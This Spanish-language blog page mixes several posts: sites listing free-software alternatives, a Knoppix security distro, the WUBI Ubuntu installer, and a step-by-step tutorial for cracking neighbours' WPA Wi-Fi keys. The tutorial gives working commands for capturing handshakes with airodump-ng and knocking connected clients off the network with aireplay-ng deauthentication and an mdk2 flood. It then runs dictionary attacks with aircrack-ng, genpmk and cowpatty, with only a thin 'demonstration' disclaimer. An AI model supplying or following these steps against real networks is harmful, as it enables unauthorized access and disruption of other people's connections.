Alternativas libres

Voy a apuntar unas webs que sirven para buscar alternativas de código abierto a software propietario.
Estas webs son básicamente una base de datos con un buscador. Cuando se les introduce en el buscador una aplicación privativa se devuelve una lista de aplicaciones libres con una puntuación de su calidad y un link a la página oficial donde descargarla.

Para que, cuando alguien piense en adquirir algo propietario, se dé primero una vuelta y busque, ya que lo mismo se encuentra con una sorpresa:

- Alternativas libres (en español, muy útil): http://www.freealts.com/
- Osalt (también en español): http://www.osalt.com/es/
- AlternativeTo (en inglés): http://alternativeto.net/

¿Cómo se utilizan estas webs? Es muy sencillo, se introduce en el buscador el programa al que se desea buscar su alter ego open source (p.ej.: "photoshop") y te devuelve la lista de alternativas al programa.

Aparece otro: Asterix

Como en todos los sitios a los que se entra, es de buena educación presentarse y decir a que se ha venido. Bien, soy Asterix y mi intención es la de echarle una mano al amigo Shak, dando a conocer esas herramientas de código abierto (con licencia de distribución libre o no) que se pueden utilizar en lugar de las tan manidas aplicaciones de pago que casi todos hemos tenido alguna vez en nuestro equipo.

La información que pongo, si no es mía, normalmente saldrá de páginas como barrapunto.com o www.genbeta.com. Lo dejo dicho para que a nadie le siente mal.

Todos los que leen este blog tienen una idea aproximada de lo que es el código abierto, así que lo que voy a hacer es dar mi opinión de cómo yo lo veo.

Cualquier programa de código abierto que se genera, parte de la idea desinteresada de unas personas que opinan que las tareas domésticas de la informática deberían realizarse sin tener que casarse con un fabricante de software y sin un desembolso adicional, que bastante caro es ya el equipo. Ese grupo de personas se reúne y dedican muchas horas de su tiempo a un trabajo cuya mayor recompensa será las gracias de muchos usuarios y los donativos de algunos.
Bajo este punto de vista, lo que quiero transmitir es que a esa gente que se dedica a hacer software libre hay que darles apoyo para que continúen con su trabajo y la mejor forma de apoyarles es utilizando su software.
Ni que decir tiene que conforme se está poniendo el asunto de los derechos de autor, es mucho más aconsejable utilizar software libre que crackear uno propietario. A ver si así se dan cuenta de que no todo lo que ponemos en los cedés y deuvedés es pirateo y nos quitan el MALDITO CANON de una vez.

El Sr. Txin aportando información

Bien, pues gracias al señor Txin, he descubierto una página que se aleja en cierto punto sobre mis temas, pero también creo que resultará interesante.

Bien pongámos en situación:
- Eres usuario de Windows????
- Cuantas veces has instalado programas que nunca has sabido manejar???

pues sigue leyendo porque te interesa....

www.manualespdf.com

Así que a partir de ahora no tienes excusa, sabes y puedes hacerlo. Mucha paciencia y con dos cojonessss!!!!!

Saludoxxxxxxxxx___________Shak

Knoppix STD. Para hecharle un rato ^^.


Buenas a tod@s:


Llevo leyendo por los foros de elhacker y seguirdadwireless un par de dias y he sacado algunos temas muy interesantes ^^.

1. Knoppix STD: security tools distribution------->http://www.knoppix-std.org/index.html

Es una distribucion Knoppix (basada en una debian al igual que ubuntu), que implementa una suite de programas de seguridad en redes bastante potente. Sin embargo es una distro algo antigua (lleva el kernel 2.4.20 del 2001 sino me equivoco) y aunque trae utilidades wireless no implementa ningún driver de ninguna tarjeta y tampoco son soportadas :(. Ahora, sí por ciertas tarjetas de red, y para tanto, se puede actualizar los paquetes de la misma.

Sin embargo, no me he creido esa posibilidad(sin wireless? mmmm xDD) y he empezado a leer en los foros de esta distribución y efectivamente lo encontré------->http://forum.s-t-d.org/viewtopic.php?id=1463

Antes de nada, debeis registraros para poder leer el post, para registraros hacedlo aquí.

En ese post se cuenta basicamente que si quieres utilizar los drivers de tu tarjeta inalambrica (salvo que sea PCMCIA ó USB), tienes que cargalos o en el boot al inicio del live-cd o sí haces instalación de la distribución std, instalarlos a mano. El problema es que al ser un kernel tan antiguo, es posible (seguro ...) que tenga problemas de dependencias, es decir, entre otros paquetes que pudiese necesitar, está el ieee80211 qué me huelo que habría que actualizarlo. (publicaré como compilar tu propio driver para una distro).

De todas formas, lo interesante en esta distribucion es la cantidad de herramientas que porta para poder explotar cantidad de servicios, así que merece la pena dedicarle algo de tiempo, aunque sea a livearla.

Por último comentar que de cada uno de los herramientas, suelen tener en su carpeta correspondiente información sobre la utilización de la misma, documentación, uso ... ;).

Haber que os parece.

Apoyo a Shaak!!

Buenas a tod@s:

Llevo bastante tiempo sin hacer acto de presencia en el blog que creó Shak y nos parece QUE ESO NO PUEDE SER ASÍ (Verdad Shak ¿? :P). En serio, esto es el principio de un buen lugar donde poder disfrutar de la información libre que aporte cada uno.

Entonces, vamos a darle un Axuxón! a Shaktale por la contribución en temas de redes inalambricas y su rapido acercamiento a gnu-linux. Ahora se siente con muchas mas ganas de seguir aportando, así que:

VAMOS SHAK!!!!!

PD: Eh!!!, y animo al resto a aportar todo lo que vean conveniente ^^.

WUBI - Ubuntu más facil que nunca

EY! Navegando por ahí me he encontrado con WUBI y me he animado a instalar Ubuntu de nuevo.
Con WUBI, simplemente ejecutando el instalador desde win2, se nos descargará la última versión de Ubuntu y se instalará en nuestro HD, sin particionar ni lios por el estilo. También agregará el bootloader para elegir el SO de arranque.
Si queremos desinstalarlo, podemos hacerlo desde win2 como si fuera cualquier otra aplicación.

Muy útil para gente que, como yo, usamos win2 como SO principal. Podeis descargarlo en:

http://www.wubi-installer.org/

Obtener clave WPA

Vamos a ver si podemos explicar de forma rápida pero simple, la obtención de claves WPA.Tenemos que matizar 2 cosas:
- En primer lugar como siempre advertimos, este tutorial es para demostrar la inseguridad de las redes, LO KE CADA UNO HAGA CON EL ES COSA SUYA
- En segundo lugar la señal deberá llegarnos con intensidad REGULAR en adelante.

En primer lugar vamos a ver que necesitamos:

- Un ordenador con Wifislax (o cualquier distribucion de Linux, siemre que tengas aircrack-ng, cowpatty y fondecrypter).
- Fondecrypter ( http://www.megaupload.com/?d=8XM4I0S3)
- Diccionario (archivo de texto, con una relación de palabras en castellano, buscad cuesta la vida encontrarlo) y sino siempre puedes hacerlo tu con paciencia.
- Pen drive para almacenar Fondecrypter y nuestro diccionario de palabaras.


Damos por sentado que sabemos montar Wifislax y demas (quién no sepa, encontrará post en este mismo blog).

Bien pues manos a la obra...todo el mundo a cargar WIFISLAX o su distribucion de Linux (yo lo voy a explicar todo con WifiSlax)...ok, todo cargado no????
En este tema no vamos a picar un poco codigo para ir familiarizandonos con la Shell de Linux.

Antes de nada ya saben todo el mundo a cargar sus drivers: Wifislax->Asistencia chipset-> y pillamos nuestros drivers.

Pues nada chicos a picar código, abrimos la shell de linux, la podemos cargar desde el escritorio que tenemos un acceso rápido y escribiremos:
(todo va sin almohadillas)

#iwconfig

(así sabremos cual es nuestra interfaz: wifi0, rausb0, etc)

#airodump-ng wifi0

(lanzamos airudump el cual detectará todas las redes que tenemos a nuestro alcance y, en este caso wifi0 porque es mi interfaz, ya sabeis cada uno con su interfaz).
(debemos tener en cuenta que haya alguien conectado a la red a atacar, una vez que lo tengamos claro abriremos una nueva Shell, para el siguiente conmando).

#airodump-ng -c 9 --bssid MAC -w archivocaptura wifi0

-c 9: canal 9, nosotros en vez de 9 pondremos el canal donde este la red
--bssid: MAC de nuestra red
-w archivocaptura: especificamos el nombre donde guardaremos la captura.

(este comando por decirlo de forma rápida lo que hace es seleccionar la red en cuestión).Abrimos una nueva consola.

Bien hasta ahora espero que bien, recordar que si estais en la versión live tendreis que dejarle pensar un poco. Lo que nosotros estamos buscando es obtener el HANDSHAKE
En este punto del ataque tenemos 2 opciones para atacar:
-------------------------------------------------------------------------------------
# aireplay-ng -0 1 -a MAC -c CLIENTE wifi0

CLIENTE: cliente que está asociado a la red

(en este proceso lo que haremos es desautentificar al cliente de la red y cuando se vuelva a conectar lo cazamos, quizas haya que repetirlo varias veces).
-------------------------------------------------------------------------------------

# mdk2 wifi0 m -t 00:11:22:33:44:55

(en este caso lo que hacemos es generar 70 clientes ficticios al router, por lo que por esa saturación el cliente que estaba conectado se caerá y cuando vuelva a conectarse ZAS!!!!! pescamos el handshake).Podremos verlo en la primera Shell donde estaban todas las redes, justo debajo aparecerán los clientes ficticios.
-------------------------------------------------------------------------------------
Bien como saber si hemos obtenido el handshake.
En la segunda shell que hemos abierto, donde sellecionabamos la red en cuestión arriba a la derecha debería aparecer handshake 00:xx:xx.......
pues continuamos cuando lo tengamos aunque aki hay dos variantes
-------------------------------------------------------------------------------------
Una vez en este paso pincharemos nuestro Pen-Drive con el archivo de diccionario que habíamos conseguido anteriormente. Al hacer esto en el escritorio, nos saldrá la unidad de disco, pondremos el ratón encima y veremos que extensión es: hba1, hdc1, etc).
-------------------------------------------------------------------------------------
Ya estamos casi acabando...

# aircarck-ng -w /mnt/.... -b MAC archivocaptura-01.cap

-w /mnt...: especificamos la ruta de donde esta el diccionario

(saltará la ventana del aircrack y verás como empieza a comparar con las palabaras de tu diccionario).

SI TIENES SUERTE Y LA SACAS PUES MI MAS SINCERA ENHORABUENAAAAAAA, sino podemos intentar hacer algo más, me refiero a que si nuestro diccionario no funciona podremos intentar generar uno a partir del Handshake.
NO IMPORTANTE:
YO NUNCA LO HE CONSEGUIDO, PERO POR LA RED HE VISTO VIDEOS EN LOS QUE FUNCIONA!!!!!!!
-------------------------------------------------------------------------------------
Ahora copiaremos el archivo Fondecrypter en la carpeta home (en el escritorio encontrarás un acceso al sitio) REUCERDA KE DESDE TENER ABIERTO EL SITIO ORIGEN Y EL DESTINO PARA PEGARLOS

#chmod 777 fondecrypter
#./fondecrypter

(al hacer esto se crea un archivo de texto keysfon.txt en la carpeta home)

#genpmk –f keysfon.txt –d archivocaptura-01.cap –s nombredelared
-f: Diccionario.
-d: Nombre del fichero de hash que se generará.
-s: El Essid.

(yo en este paso, estuvo durante 7 horas y no encontró nada, pero si en vuestro caso lo encuentra solo os quedará hacer)

#cowpatty -r archivocaptura-01.cap –d keysfond.txt –s nombredelared
-r: Fichero *.cap donde capturamos el handshake con el airodump.
-d: Nombre del fichero generado con la utilidad genpmk.
-s: El Essid.

(y supuestamente debería darte la clave, pero ya te digo yo nunca lo he conseguido pero se que se puede).

En fin espero que os sirva todo y que os sirva todo, y si teneis alguna duda ya sabeis, en google esta la solución, aunque siempre podreis dejar un post akí y se intentará´ayudarte en lo que se pueda).

Saludoxxxxxxxx______Shak

Twitter Facebook Favorites More